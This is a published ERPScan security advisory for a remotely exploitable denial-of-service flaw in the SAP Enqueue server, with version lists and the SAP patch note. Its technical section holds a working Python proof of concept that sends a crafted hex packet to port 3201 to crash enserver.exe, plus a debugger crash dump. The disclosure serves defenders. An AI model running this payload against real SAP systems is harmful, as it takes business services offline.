[ERPSCAN-17-049] Denial of Service in Enqueue server
Application: SAP Enqueue
Versions Affected: 7490.17.26.5735
Vendor URL: SAP
Bug: DoS
Reported: 16.05.2017
Vendor response: 17.05.2017
Date of Public Advisory: 10.10.2017
Reference: SAP Security Note 2476937
Author: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Denial of Service
Risk: high priority
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS v3 Base Score: 7.5 / 10
CVSS Base v3 Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | High (H) |
DESCRIPTION
An anonymous attacker can use a special request for crash enserver.exe process on the server.
BUSINESS RISK
A Denial of Service vulnerability can be used to terminate the process of a vulnerable component. For this time, nobody can use this service. This fact negatively influences business processes, system downtime, and business reputation as a result.
VULNERABLE PACKAGES
SAP KERNEL 7.53 64-BIT
SAP KERNEL 7.52 64-BIT
SAP KERNEL 7.51 64-BIT
SAP KERNEL 7.50 64-BIT
SAP KERNEL 7.49 64-BIT
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 32-BIT
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2476937
TECHNICAL DESCRIPTION
Proof of Concept
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
import socket PoC = "00000058abcde123000000000000005800000058060100000000000600000000000003e800000001000003e800000003707973617027732d6d6f6e69746f72000000e0b98000020000003b0000000500000003000000060000000400000001" for i in range(1): try: sock = socket.socket() sock.connect((SAP_SERVER, 3201)) sock.send(PoC.decode("hex")) data = sock.recv(1024) sock.close() except Exception, ex: ex.message 0:007> r rax=000000003c4c51a0 rbx=ffffffff8b0602d4 rcx=0000000000000000 rdx=000000003c4c51a0 rsi=000000007ffffe14 rdi=0000000000000002 rip=000000013fa18e82 rsp=00000000414ef2e0 rbp=00000000414ef328 r8=000000003c4c51a0 r9=00000000414ef3d0 r10=000000013ff6b1e0 r11=0000000000000001 r12=0000000080000200 r13=000000000b0600a4 r14=0000000000000006 r15=0000000000000004 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 enserver!EncOAMParamParse+0x102: 00000001`3fa18e82 0fb64301 movzx eax,byte ptr [rbx+1] ds:ffffffff`8b0602d5=?? |